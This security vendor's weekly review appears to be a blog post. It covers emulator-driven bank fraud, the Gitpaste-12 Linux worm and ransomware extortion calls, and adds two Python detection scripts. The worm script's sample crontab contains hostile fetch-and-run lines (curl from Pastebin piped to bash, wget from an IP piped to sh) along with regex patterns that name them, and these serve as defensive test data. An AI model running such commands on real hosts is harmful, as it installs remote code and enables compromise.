Cybersecurity Week in Review: 12/14
Posted by: GuidePoint Security
This week we report on a large-scale financial fraud operation run by a sophisticated criminal gang and on an insidious malware worm targeting Linux devices. We also examine a dangerous trend in ransomware attacks: in-person harassment and coercion of victims. And if you want further information about the SolarWinds breach, check out our web page here. Our own Digital Forensics and Incident Response team continues to track the SolarWinds breach and has developed resources to help you stay up to date with the latest analysis and insights, as well as recommendations for safeguarding your organization.
Major banking fraud operation discovered
Security researchers announced last week the discovery of a major banking fraud operation that stole millions of dollars from financial institutions in the US and Europe. Using an infrastructure of roughly 20 mobile device emulators, a professional organized gang spoofed more than 16,000 devices.
Researchers believe the criminals collected usernames and passwords through earlier malware infections on victims' mobile devices or through financial phishing pages. With those credentials in hand, they loaded stolen mobile device identifiers into the emulators so that each session looked as if it came from the account holder's own phone. Scripts then logged in, checked balances, and initiated automated money transfers, always in amounts small enough to stay below the bank's review threshold (think of Office Space).
Prior to discovering and halting the attacks, security professionals estimate that thousands of financial accounts were breached, with millions of dollars stolen.
Notably, the emulator setup was not tied to a single target: it could be pointed at any banking application that offers online access, and it worked even where transactions required approval with an SMS code. The criminals also wrote customized network scripts that spoke directly to the banking application's API. Besides submitting the transaction, these scripts monitored the traffic between the application and the financial institution to confirm that no fraud control had been triggered.
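The three behaviours described above (one network source cycling through many "devices", balance checks followed seconds later by transfers, and transfer amounts parked just under the review limit) are each detectable on the bank's side. The script below is an added example written for this article, not code from the researchers who reported the operation or from any bank; the log format, field names, thresholds and every sample event are assumptions constructed for the demo.

```python
"""Spot emulator-farm style account takeover in a bank's session/transfer log.

Added example, not from the original article or from the researchers who
reported the operation. Log format, field names, thresholds and the sample
events are all assumptions constructed for this demo.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

REVIEW_THRESHOLD = 1000.00      # hypothetical manual-review limit for one transfer
STRUCTURING_BAND = 0.10         # flag transfers within 10% below that limit
MAX_DEVICES_PER_SOURCE = 4      # more distinct device IDs than this per source in WINDOW is suspicious
WINDOW = timedelta(minutes=30)

# Constructed sample log lines (not real data): one legitimate customer behind
# 198.51.100.4 and an emulator farm behind 203.0.113.7 cycling device IDs.
SAMPLE_LOG = """\
2020-12-07T10:00:01 acct=A1001 dev=9f2c-phone src=198.51.100.4 act=balance amt=0
2020-12-07T10:03:44 acct=A1001 dev=9f2c-phone src=198.51.100.4 act=transfer amt=1500.00
2020-12-07T10:05:02 acct=B2001 dev=e1a0 src=203.0.113.7 act=balance amt=0
2020-12-07T10:05:04 acct=B2001 dev=e1a0 src=203.0.113.7 act=transfer amt=980.00
2020-12-07T10:05:31 acct=B2002 dev=e1a1 src=203.0.113.7 act=balance amt=0
2020-12-07T10:05:33 acct=B2002 dev=e1a1 src=203.0.113.7 act=transfer amt=975.00
2020-12-07T10:06:10 acct=B2003 dev=e1a2 src=203.0.113.7 act=balance amt=0
2020-12-07T10:06:12 acct=B2003 dev=e1a2 src=203.0.113.7 act=transfer amt=990.00
2020-12-07T10:06:48 acct=B2004 dev=e1a3 src=203.0.113.7 act=balance amt=0
2020-12-07T10:06:50 acct=B2004 dev=e1a3 src=203.0.113.7 act=transfer amt=995.00
2020-12-07T10:07:20 acct=B2005 dev=e1a4 src=203.0.113.7 act=balance amt=0
2020-12-07T10:07:22 acct=B2005 dev=e1a4 src=203.0.113.7 act=transfer amt=960.00
2020-12-07T10:40:00 acct=A1001 dev=9f2c-phone src=198.51.100.4 act=transfer amt=40.00
"""


def parse_event(line):
    """Turn one 'key=value' log line into a dict; timestamp parsed, amount as float."""
    ts, *fields = line.split()
    ev = {"ts": datetime.fromisoformat(ts)}
    for f in fields:
        k, _, v = f.partition("=")
        ev[k] = v
    ev["amt"] = float(ev["amt"])
    return ev


def parse_log(text):
    return [parse_event(l) for l in text.splitlines() if l.strip()]


def emulator_farm_sources(events, max_devices=MAX_DEVICES_PER_SOURCE, window=WINDOW):
    """Sources that presented more than max_devices distinct device IDs inside any window."""
    recent = defaultdict(deque)   # src -> deque of (ts, dev) still inside the window
    flagged = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        q = recent[ev["src"]]
        q.append((ev["ts"], ev["dev"]))
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()
        if len({dev for _, dev in q}) > max_devices:
            flagged.add(ev["src"])
    return flagged


def structured_transfers(events, threshold=REVIEW_THRESHOLD, band=STRUCTURING_BAND):
    """Transfers sitting just below the review threshold (classic structuring)."""
    lo = threshold * (1 - band)
    return [ev for ev in events if ev["act"] == "transfer" and lo <= ev["amt"] < threshold]


def automated_sessions(events, max_gap_seconds=5):
    """Accounts where a balance check is followed by a transfer within a few seconds (scripted use)."""
    last_balance = {}
    hits = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["acct"], ev["dev"])
        if ev["act"] == "balance":
            last_balance[key] = ev["ts"]
        elif ev["act"] == "transfer" and key in last_balance:
            if (ev["ts"] - last_balance[key]).total_seconds() <= max_gap_seconds:
                hits.add(ev["acct"])
    return hits


def analyze(text):
    """Combine the three signals; a transfer matching all three is the highest-confidence alert."""
    events = parse_log(text)
    farms = emulator_farm_sources(events)
    structured = structured_transfers(events)
    scripted = automated_sessions(events)
    high = [ev for ev in structured if ev["src"] in farms and ev["acct"] in scripted]
    return {"farm_sources": farms, "structured": structured,
            "scripted_accounts": scripted, "high_confidence": high}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    print("emulator-farm sources:", sorted(result["farm_sources"]))
    for ev in result["high_confidence"]:
        print(f"ALERT {ev['ts']} acct={ev['acct']} dev={ev['dev']} src={ev['src']} amt={ev['amt']:.2f}")
```

Any one signal alone produces false positives (a corporate NAT gateway legitimately fronts many devices; a customer may happen to send 990), which is why the combined check is the one worth paging on. In production the "source" key would be the device fingerprint or TLS/HTTP fingerprint rather than a bare IP, since a farm can rotate proxies far more easily than it can rotate emulator builds.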
Because of the scale and sophistication involved in these attacks, security professionals believe that the criminals were part of a large and experienced organized group with expertise in mobile malware and money laundering.
More about this banking fraud operation is available here.
Malware worm targets servers and IoT devices
A new malware worm, with at least 12 different attack modules, is infiltrating Linux-based x86 servers and Linux internet of things (IoT) devices for botnet expansion.
This highly versatile malware uses GitHub and Pastebin to host its malicious component code. Dubbed ‘Gitpaste-12’, the worm first compromises Linux systems via 11 previously disclosed vulnerabilities (including CVE-2017-5638, CVE-2013-5948, CVE-2017-14135, and CVE-2020-10987). Researchers also believe that the malware attempts brute-force password guessing.
The malware script first installs a cron job (cron is the Linux task scheduler) on the infected host that repeatedly fetches a script from Pastebin and executes it, which is how the worm re-downloads itself and persists. It then downloads and runs a script from GitHub that disables security features. The malware also hides from system administrators: a library it installs intercepts readdir calls (the library function used to enumerate directory entries) and skips the /proc directories of the processes it wants to hide, so they never show up in a process listing. The same library downloads and executes further malicious code stored in Pastebin files.
What makes this malware particularly dangerous is that it is wormable: an infected host scans for and attacks other systems, so the botnet grows on its own.
Security researchers reported the Pastebin URL, and the GitHub repository was shut down in late October, cutting off the worm's component downloads and halting the botnet's growth.
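Both persistence tricks described above leave a footprint an administrator can check for: a cron entry that pulls and runs code from a paste site, and a process-hiding hook that only affects directory listings. The script below is an added example written for this article, not code from the researchers who analysed the worm; the crontab text, the simulated PID sets and the path names are assumptions constructed for the demo, and the live checks need root to see every process.

```python
"""Two host checks for the Gitpaste-12 behaviours described above.

Added example, not from the original article or from the researchers who
analysed the worm. The sample crontab, the simulated PID sets and the paths
are assumptions made for this demo.
"""
import os
import re

# Hosts the article says the worm pulls its components from.
PASTE_HOSTS = ("pastebin.com", "raw.githubusercontent.com", "github.com")
# A cron command that fetches a URL, and one that pipes a download into a shell.
FETCH_RE = re.compile(r"\b(curl|wget)\b.*?(?P<url>https?://\S+)", re.I)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba)?sh\b")


def suspicious_cron_lines(crontab_text):
    """(line, url) pairs for cron entries that download from a paste/code host
    or pipe a download straight into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        m = FETCH_RE.search(s)
        if not m:
            continue
        url = m.group("url")
        if any(h in url for h in PASTE_HOSTS) or PIPE_TO_SHELL_RE.search(s):
            hits.append((s, url))
    return hits


def hidden_pids(listed_pids, pid_exists, max_pid):
    """PIDs that a readdir()-based listing omits but a direct stat() still finds.

    A hook on readdir (the trick the article describes) filters the entries
    returned when /proc is enumerated; it does not intercept the separate
    stat() that os.path.exists() makes on /proc/<pid>, so the two views
    disagree for every hidden process. Pure function so it can be tested."""
    listed = set(listed_pids)
    return sorted(pid for pid in range(1, max_pid + 1)
                  if pid not in listed and pid_exists(pid))


def live_hidden_pids(max_pid=None):
    """Run hidden_pids() against the real /proc (Linux only)."""
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = int(f.read())
    listed = {int(n) for n in os.listdir("/proc") if n.isdigit()}
    return hidden_pids(listed, lambda p: os.path.exists(f"/proc/{p}"), max_pid)


def ld_preload_entries(path="/etc/ld.so.preload"):
    """Libraries forced into every process; a userland hook library is commonly
    planted here (assumed location, worth checking alongside LD_PRELOAD in env)."""
    try:
        with open(path) as f:
            return [l.strip() for l in f if l.strip() and not l.startswith("#")]
    except FileNotFoundError:
        return []


# Constructed sample crontab (not from a real infection).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * curl -sL https://pastebin.com/raw/EXAMPLE | bash
*/5 * * * * wget -q -O- http://203.0.113.9/update.sh | sh
30 2 * * 0 /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for line, url in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("suspicious cron entry:", line)
    # Simulated hooked view: the listing lacks PID 4242 although it exists.
    print("hidden (simulated):", hidden_pids({1, 2, 4241}, lambda p: p in {1, 2, 4241, 4242}, 5000))
    if os.path.isdir("/proc"):
        print("hidden (live):", live_hidden_pids())
        print("ld.so.preload:", ld_preload_entries())
```

On a real host, feed `suspicious_cron_lines` the output of `crontab -l` for each user plus the files under `/etc/cron.d`, and treat any non-empty result from `live_hidden_pids` as a finding to investigate, not an automatic verdict: a process that exits between the listing and the probe will show up once as a false positive, so run it twice before escalating.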
You can read more on the Gitpaste-12 malware’s features here.
Ransomware gangs turn to in-person harassment
The FBI reported last week that the DoppelPaymer ransomware gang is intimidating and coercing victims into payment through cold calling. Beginning as early as February 2020, DoppelPaymer criminals began contacting victims to extort payments after infecting the companies’ systems with ransomware. According to the FBI Private Industry Notification (PIN), in one example a DoppelPaymer threat actor used a spoofed US-based telephone number to contact a ransomware victim:
“[the criminal gang member] threatened to leak or sell data from [the identified business] if the business did not pay the ransom. During subsequent telephone calls to the same business, the actor threatened to send an individual to the home of an employee and provided the employee’s home address. The actor also called several of the employee’s relatives.”
Since the DoppelPaymer incidents began last February, several other ransomware gangs have resorted to cold calling victims. The gangs include two now-defunct groups (Sekhmet and Maze), as well as the high-profile Conti and Ryuk gangs.
To mitigate the impact of a ransomware attack, the FBI recommends:
· Ensuring system back-ups are secure (see our article from last week on the criminals targeting back-up files with ransomware.)
· Auditing user accounts regularly, particularly any account that is publicly accessible, such as Remote Monitoring and Management accounts.
· Patching promptly
· Monitoring inbound and outbound network traffic and setting alerts for data exfiltration
· Using two-factor authentication
· Implementing the principle of ‘least privilege’ for all systems and permissions.
You can read more on this story here and here.
Final Words
We seem to have crossed a major milestone recently. No longer are cybercriminals content to simply send you a poorly worded warning informing you that your system is infected with malware or ransomware and you better pay up. Instead, they’ve resorted to a level of in-person harassment and extortion rarely seen in the professional business world. They’re leveraging connections and expertise in mobile malware and money laundering to build large-scale criminal operations. And they’re being funded and supported by foreign governments. How does a legitimate business compete?
The answer is to ‘stay the course’ and continue to apply key cybersecurity principles:
1. Remember that detection is as important as prevention.
2. Patch vulnerable systems and software.
3. Limit who has access to your systems and accounts.
4. Use two-factor authentication.
5. Expect that breaches and compromises are going to happen. Be prepared to mitigate.
Cybersecurity equals action. You get out what you put into it.
GuidePoint Security